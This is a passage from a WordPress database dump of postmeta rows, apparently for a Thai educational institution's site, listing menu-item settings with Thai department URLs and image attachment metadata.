(3967, 903, '_edit_lock', '1518771104:3'),
(3968, 1160, '_menu_item_type', 'custom'),
(3969, 1160, '_menu_item_menu_item_parent', '227'),
(3970, 1160, '_menu_item_object_id', '1160'),
(3971, 1160, '_menu_item_object', 'custom'),
(3972, 1160, '_menu_item_target', ''),
(3973, 1160, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(3974, 1160, '_menu_item_xfn', ''),
(3975, 1160, '_menu_item_url', '/งานกิจกรรมนักเรียน-นักศ'),
(3977, 1161, '_menu_item_type', 'custom'),
(3978, 1161, '_menu_item_menu_item_parent', '227'),
(3979, 1161, '_menu_item_object_id', '1161'),
(3980, 1161, '_menu_item_object', 'custom'),
(3981, 1161, '_menu_item_target', ''),
(3982, 1161, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(3983, 1161, '_menu_item_xfn', ''),
(3984, 1161, '_menu_item_url', '/งานครูที่ปรึกษา'),
(3986, 1162, '_menu_item_type', 'custom'),
(3987, 1162, '_menu_item_menu_item_parent', '227'),
(3988, 1162, '_menu_item_object_id', '1162'),
(3989, 1162, '_menu_item_object', 'custom'),
(3990, 1162, '_menu_item_target', ''),
(3991, 1162, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(3992, 1162, '_menu_item_xfn', ''),
(3993, 1162, '_menu_item_url', '/งานปกครอง'),
(3995, 1163, '_menu_item_type', 'custom'),
(3996, 1163, '_menu_item_menu_item_parent', '227'),
(3997, 1163, '_menu_item_object_id', '1163'),
(3998, 1163, '_menu_item_object', 'custom'),
(3999, 1163, '_menu_item_target', ''),
(4000, 1163, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4001, 1163, '_menu_item_xfn', ''),
(4002, 1163, '_menu_item_url', '/งานแนะแนวอาชีพและการจั'),
(4004, 1164, '_menu_item_type', 'custom'),
(4005, 1164, '_menu_item_menu_item_parent', '227'),
(4006, 1164, '_menu_item_object_id', '1164'),
(4007, 1164, '_menu_item_object', 'custom'),
(4008, 1164, '_menu_item_target', ''),
(4009, 1164, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4010, 1164, '_menu_item_xfn', ''),
(4011, 1164, '_menu_item_url', '/งานสวัสดิการนักเรียน-นั'),
(4013, 1165, '_menu_item_type', 'custom'),
(4014, 1165, '_menu_item_menu_item_parent', '227'),
(4015, 1165, '_menu_item_object_id', '1165'),
(4016, 1165, '_menu_item_object', 'custom'),
(4017, 1165, '_menu_item_target', ''),
(4018, 1165, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4019, 1165, '_menu_item_xfn', ''),
(4020, 1165, '_menu_item_url', '/งานโครงการพิเศษและบริก'),
(4022, 1160, '_publicize_pending', '1'),
(4023, 1161, '_publicize_pending', '1'),
(4024, 1162, '_publicize_pending', '1'),
(4025, 1163, '_publicize_pending', '1'),
(4026, 1164, '_publicize_pending', '1'),
(4027, 1165, '_publicize_pending', '1'),
(4038, 1167, '_edit_lock', '1529391232:3'),
(4039, 1167, '_edit_last', '3'),
(4042, 1169, '_wp_attached_file', '2018/02/16-2-2561-16-17-21.jpg'),
(4043, 1169, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:697;s:6:\"height\";i:416;s:4:\"file\";s:30:\"2018/02/16-2-2561-16-17-21.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"16-2-2561-16-17-21-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"16-2-2561-16-17-21-300x179.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:179;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"16-2-2561-16-17-21-400x239.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:239;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4044, 1167, '_hide_featured', NULL),
(4045, 1167, '_publicize_pending', '1'),
(4046, 1174, '_edit_lock', '1542017993:4'),
(4047, 1174, '_edit_last', '4'),
(4048, 1174, '_publicize_pending', '1'),
(4049, 1174, '_hide_featured', NULL),
(4050, 1176, '_wp_attached_file', '2018/02/ดาวน์โหลด.png'),
(4051, 1176, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:225;s:6:\"height\";i:225;s:4:\"file\";s:39:\"2018/02/ดาวน์โหลด.png\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:39:\"ดาวน์โหลด-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4052, 1177, '_wp_attached_file', '2018/02/images-1.png'),
(4053, 1177, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:304;s:6:\"height\";i:166;s:4:\"file\";s:20:\"2018/02/images-1.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"images-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"images-1-300x164.png\";s:5:\"width\";i:300;s:6:\"height\";i:164;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4058, 1189, '_edit_lock', '1538091133:4'),
(4059, 1189, '_edit_last', '4'),
(4060, 1189, '_publicize_pending', '1'),
(4061, 1189, '_hide_featured', NULL),
(4062, 1193, '_wp_attached_file', '2018/02/19-2-2561-9-35-41.jpg'),
(4063, 1193, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:829;s:6:\"height\";i:617;s:4:\"file\";s:29:\"2018/02/19-2-2561-9-35-41.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"19-2-2561-9-35-41-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"19-2-2561-9-35-41-300x223.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:223;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"19-2-2561-9-35-41-768x572.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:572;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"19-2-2561-9-35-41-400x298.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:298;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4066, 1197, '_wp_attached_file', '2018/02/19-2-2561-10-41-04.jpg'),
(4067, 1197, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:822;s:6:\"height\";i:614;s:4:\"file\";s:30:\"2018/02/19-2-2561-10-41-04.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"19-2-2561-10-41-04-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"19-2-2561-10-41-04-300x224.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:224;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"19-2-2561-10-41-04-768x574.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:574;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"19-2-2561-10-41-04-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4068, 1198, '_wp_attached_file', '2018/02/19-2-2561-10-48-21.jpg'),
(4069, 1198, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:517;s:6:\"height\";i:96;s:4:\"file\";s:30:\"2018/02/19-2-2561-10-48-21.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"19-2-2561-10-48-21-150x96.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:96;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"19-2-2561-10-48-21-300x56.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:56;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"19-2-2561-10-48-21-400x74.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:74;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4070, 1200, '_wp_attached_file', '2018/02/19-2-2561-11-07-46.jpg'),
(4071, 1200, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:431;s:6:\"height\";i:160;s:4:\"file\";s:30:\"2018/02/19-2-2561-11-07-46.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"19-2-2561-11-07-46-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"19-2-2561-11-07-46-300x111.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:111;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"19-2-2561-11-07-46-400x148.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:148;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4072, 1201, '_wp_attached_file', '2018/02/19-2-2561-11-13-08.jpg'),
(4073, 1201, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:424;s:6:\"height\";i:158;s:4:\"file\";s:30:\"2018/02/19-2-2561-11-13-08.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"19-2-2561-11-13-08-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"19-2-2561-11-13-08-300x112.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:112;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"19-2-2561-11-13-08-400x149.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:149;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4074, 1202, '_wp_attached_file', '2018/02/19-2-2561-11-12-53.jpg'),
(4075, 1202, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:433;s:6:\"height\";i:164;s:4:\"file\";s:30:\"2018/02/19-2-2561-11-12-53.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"19-2-2561-11-12-53-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"19-2-2561-11-12-53-300x114.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:114;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"19-2-2561-11-12-53-400x152.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:152;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4076, 1203, '_wp_attached_file', '2018/02/19-2-2561-11-08-12.jpg'),
(4077, 1203, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:437;s:6:\"height\";i:170;s:4:\"file\";s:30:\"2018/02/19-2-2561-11-08-12.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"19-2-2561-11-08-12-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"19-2-2561-11-08-12-300x117.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:117;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"19-2-2561-11-08-12-400x156.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:156;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4078, 1204, '_wp_attached_file', '2018/02/19-2-2561-11-08-25.jpg'),
(4079, 1204, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:436;s:6:\"height\";i:162;s:4:\"file\";s:30:\"2018/02/19-2-2561-11-08-25.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"19-2-2561-11-08-25-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"19-2-2561-11-08-25-300x111.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:111;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"19-2-2561-11-08-25-400x149.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:149;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4088, 1214, '_wp_attached_file', '2018/02/19-2-2561-14-06-48.jpg'),
(4089, 1214, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:821;s:6:\"height\";i:175;s:4:\"file\";s:30:\"2018/02/19-2-2561-14-06-48.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"19-2-2561-14-06-48-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"19-2-2561-14-06-48-300x64.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:64;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"19-2-2561-14-06-48-768x164.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:164;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"19-2-2561-14-06-48-400x85.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4092, 1218, '_wp_attached_file', '2018/02/19-2-2561-14-35-59.jpg'),
(4093, 1218, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1078;s:6:\"height\";i:508;s:4:\"file\";s:30:\"2018/02/19-2-2561-14-35-59.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"19-2-2561-14-35-59-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"19-2-2561-14-35-59-300x141.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:141;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"19-2-2561-14-35-59-768x362.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:362;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:31:\"19-2-2561-14-35-59-1024x483.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:483;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"19-2-2561-14-35-59-400x188.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:188;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4096, 1222, '_wp_attached_file', '2018/02/19-2-2561-16-13-26.jpg'),
(4097, 1222, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1050;s:6:\"height\";i:515;s:4:\"file\";s:30:\"2018/02/19-2-2561-16-13-26.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"19-2-2561-16-13-26-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"19-2-2561-16-13-26-300x147.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:147;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"19-2-2561-16-13-26-768x377.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:377;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:31:\"19-2-2561-16-13-26-1024x502.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:502;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"19-2-2561-16-13-26-400x196.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:196;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4098, 1224, '_wp_attached_file', '2018/02/19-2-2561-16-13-26-1.jpg'),
(4099, 1224, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1079;s:6:\"height\";i:515;s:4:\"file\";s:32:\"2018/02/19-2-2561-16-13-26-1.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"19-2-2561-16-13-26-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"19-2-2561-16-13-26-1-300x143.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:143;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:32:\"19-2-2561-16-13-26-1-768x367.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:367;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:33:\"19-2-2561-16-13-26-1-1024x489.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:489;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:32:\"19-2-2561-16-13-26-1-400x191.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:191;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4104, 1230, '_wp_attached_file', '2018/02/20-2-2561-11-17-30.jpg'),
(4105, 1230, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1120;s:6:\"height\";i:580;s:4:\"file\";s:30:\"2018/02/20-2-2561-11-17-30.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"20-2-2561-11-17-30-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"20-2-2561-11-17-30-300x155.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"20-2-2561-11-17-30-768x398.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:31:\"20-2-2561-11-17-30-1024x530.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:530;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"20-2-2561-11-17-30-400x207.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:207;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4108, 1240, '_menu_item_type', 'custom'),
(4109, 1240, '_menu_item_menu_item_parent', '0'),
(4110, 1240, '_menu_item_object_id', '1240'),
(4111, 1240, '_menu_item_object', 'custom'),
(4112, 1240, '_menu_item_target', ''),
(4113, 1240, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4114, 1240, '_menu_item_xfn', ''),
(4115, 1240, '_menu_item_url', '/en/'),
(4117, 1241, '_menu_item_type', 'custom'),
(4118, 1241, '_menu_item_menu_item_parent', '0'),
(4119, 1241, '_menu_item_object_id', '1241'),
(4120, 1241, '_menu_item_object', 'custom'),
(4121, 1241, '_menu_item_target', ''),
(4122, 1241, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4123, 1241, '_menu_item_xfn', ''),
(4124, 1241, '_menu_item_url', '#'),
(4126, 1242, '_menu_item_type', 'custom'),
(4127, 1242, '_menu_item_menu_item_parent', '0'),
(4128, 1242, '_menu_item_object_id', '1242'),
(4129, 1242, '_menu_item_object', 'custom'),
(4130, 1242, '_menu_item_target', ''),
(4131, 1242, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4132, 1242, '_menu_item_xfn', ''),
(4133, 1242, '_menu_item_url', '#'),
(4135, 1243, '_menu_item_type', 'custom'),
(4136, 1243, '_menu_item_menu_item_parent', '0'),
(4137, 1243, '_menu_item_object_id', '1243'),
(4138, 1243, '_menu_item_object', 'custom'),
